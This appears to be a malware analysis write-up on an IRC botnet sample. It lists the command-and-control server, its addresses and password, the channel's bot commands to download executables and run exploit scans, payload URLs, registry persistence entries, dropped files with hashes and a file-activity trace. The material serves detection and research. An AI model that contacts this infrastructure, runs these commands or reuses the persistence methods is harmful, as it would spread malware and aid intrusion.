This one is special because you have to make some modifications to your IRC client to join the server:
Server: ms4all.twoplayers.net
DNS_TYPE_A:
204.45.85.218
109.196.130.50
109.196.130.66
204.45.85.210
Connected to: 204.45.85.218:57221
PASS laorosr
Channel #dpi
Channel #!
Now talking in #!
Topic is ‘.asc -S|.http http://208.53.183.101/b.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 20 5 0 -b|.asc exp_all 20 5 0 -c|.asc exp_all 10 5 0 -a’
Set by Boss44 on Sun Aug 22 05:45:46
Process Created: C:\WINDOWS\cfdrive32.exe
Here is the same botnet on a different port:
DNS Lookup
Host Name              IP Address
dell-d3e62f7e26        10.1.8.2
ms4all.twoplayers.net  109.196.130.50
www.nippon.to          112.78.112.208
www.cooleasy.com       218.5.74.190
obsoletegod.com
Download URLs
http://112.78.112.208/cgi-bin/prxjdg.cgi (www.nippon.to) (requested 3 times)
http://218.5.74.190/cgi-bin/prxjdg.cgi (www.cooleasy.com) (requested 3 times)
Outgoing connections to remote servers:
ms4all.twoplayers.net port 47221
www.nippon.to TCP port 80 (3 connections)
www.cooleasy.com TCP port 80
IRC commands sent:
MODE #! -ix
MODE #Ma -ix
USER SP2-917 * 0 :COMPUTERNAME
MODE [N00_USA_XP_3823888] @ -ix
MODE #dpi -ix
* The data identified by the following URLs was then requested from the remote web server:
o http://www.nippon.to/cgi-bin/prxjdg.cgi
o http://208.53.183.124/rr.exe
o http://208.53.183.222/click.exe
o http://208.53.183.92/usa.exe
o http://www.cooleasy.com/cgi-bin/prxjdg.cgi
o http://74.63.78.27/block.exe
o http://91.212.127.147/spm/s_get_host.php?ver=522
o http://91.212.127.147/spm/s_alive.php?id=52290167395777249625578240136849&tick=114218&ver=522&smtp=ok&sl=1&fw=0&pn=0&psr=0
o http://91.212.127.147/spm/s_task.php?id=52290167395777249625578240136849
Other details
* Numerous TCP ports were open in the system, each bound to cfdrive32.exe (%Windir%\cfdrive32.exe) or msvmiode.exe (%System%\msvmiode.exe).
Registry Modifications
* The following Registry Keys were created:
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
+ Microsoft Driver Setup = “%Windir%\cfdrive32.exe”
so that cfdrive32.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ MSODESNV7 = “%System%\msvmiode.exe”
so that msvmiode.exe runs every time Windows starts
+ Microsoft Driver Setup = “%Windir%\cfdrive32.exe”
so that cfdrive32.exe runs every time Windows starts
+ 24024 = “%System%\syscache.exe”
so that syscache.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup]
+ ridt100413 = “1”
+ id = “52290167395777249625578240136849”
+ host = “91.212.127.147”
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
+ Taskman = “%AppData%\ltzqai.exe”
so that ltzqai.exe runs every time Windows starts
Memory Modifications
* There were new processes created in the system:
Process Name    Process Filename          Main Module Size
cfdrive32.exe   %Windir%\cfdrive32.exe    339 968 bytes
msvmiode.exe    %System%\msvmiode.exe     159 744 bytes
syscache.exe    %System%\syscache.exe      90 112 bytes
218880.exe      %Temp%\218880.exe         339 968 bytes
File System Modifications
* The following files were created in the system:
#  Filename(s) / File Size / File Hash
1  %AppData%\ltzqai.exe [file and pathname of the sample #1]
   81 920 bytes  MD5: 0xD9E7F29BDC3360F88F907607EFCF115A  SHA-1: 0x8A47B56FCEDA2D872F6A64A1BDC8C472090EDC81
2  %Temp%\166579.exe
   2 172 bytes  MD5: 0x2BCDE5450540F3B929CC36159C90C7BD  SHA-1: 0x1AEB1CD14AEAFEA9395D7B8C84BDCCE138AE915C
3  %Temp%\218880.exe, %Windir%\cfdrive32.exe
   86 016 bytes  MD5: 0x4154F0AD2AA86ABA7543D121EEA5ECA8  SHA-1: 0xD286B43BDDFDAF6C45F0535CFD3F7D7EE4A94242
4  %Temp%\22728.exe, %System%\msvmiode.exe
   176 128 bytes  MD5: 0x616C7BCAE12DF9D577EE3973741B3044  SHA-1: 0x0FB88C07A93B53F321A0BD33277EABB09A6DD83C
5  %Temp%\24024.exe, %System%\syscache.exe
   126 976 bytes  MD5: 0xEFAA4CAD70DB7D08AA32BA670260A0D5  SHA-1: 0x2E623CED33120C9A8DA76C60C338F9FF493CF1EC
6  %Windir%\hosts
   267 619 bytes  MD5: 0xDB594439DE8B36C39F845D34FB43B41A  SHA-1: 0x0328295CD1DA611F3782E08BD4CA0235B4CE5DAF
7  %System%\drivers\hosts
   266 648 bytes  MD5: 0x143048AB28E3733F0BDD749CEF208096  SHA-1: 0xF7FAF1D69616DD8220ED9193C4D719C06109BCC5
8  %System%\hosts
   250 252 bytes  MD5: 0x170C57E3702CFE8CE908BE2ACEA3E699  SHA-1: 0x209E8177354DC8F4A47C0CAAC12BA242465AB65D
Registry Changes by all processes
Create or Open
Changes:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “Microsoft Driver Setup” = C:\WINDOWS\cfdrive32.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run “Microsoft Driver Setup” = C:\WINDOWS\cfdrive32.exe
Chronological Order
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Get File Attributes: C:\WINDOWS\cfdrive32.exe Flags: (SECURITY_ANONYMOUS)
Copy File: c:\rr.exe to C:\WINDOWS\cfdrive32.exe
Set File Attributes: C:\WINDOWS\cfdrive32.exe Flags: (FILE_ATTRIBUTE_HIDDEN FILE_ATTRIBUTE_READONLY FILE_ATTRIBUTE_SYSTEM SECURITY_ANONYMOUS)
Get File Attributes: C:\WINDOWS\Registration Flags: (SECURITY_ANONYMOUS)
Open File: C:\WINDOWS\Registration\R000000000007.clb (OPEN_EXISTING)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\sysmain.sdb (OPEN_EXISTING)
Open File: C:\WINDOWS\AppPatch\systest.sdb (OPEN_EXISTING)
Open File: \Device\NamedPipe\ShimViewer (OPEN_EXISTING)
Open File: C:\WINDOWS ()
Find File: C:\WINDOWS\cfdrive32.exe
Create/Open File: \Device\Tcp (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Create/Open File: \Device\Ip (OPEN_ALWAYS)
Open File: \\.\Ip (OPEN_EXISTING)
Create/Open File: \Device\RasAcd (OPEN_ALWAYS)
Open File: %windir%/logfile32.log (OPEN_EXISTING)
Create File: %windir%/logfile32.log
Open File: \\.\PIPE\ROUTER (OPEN_EXISTING)
Open File: \\.\PIPE\lsarpc (OPEN_EXISTING)
Get File Attributes: c:\autoexec.bat Flags: (SECURITY_ANONYMOUS)
Open File: c:\autoexec.bat (OPEN_EXISTING)
Find File: C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Microsoft\Network\Connections\Pbk\*.pbk
Find File: C:\WINDOWS\system32\Ras\*.pbk
Find File: C:\Dokumente und Einstellungen\Administrator\Anwendungsdaten\Microsoft\Network\Connections\Pbk\*.pbk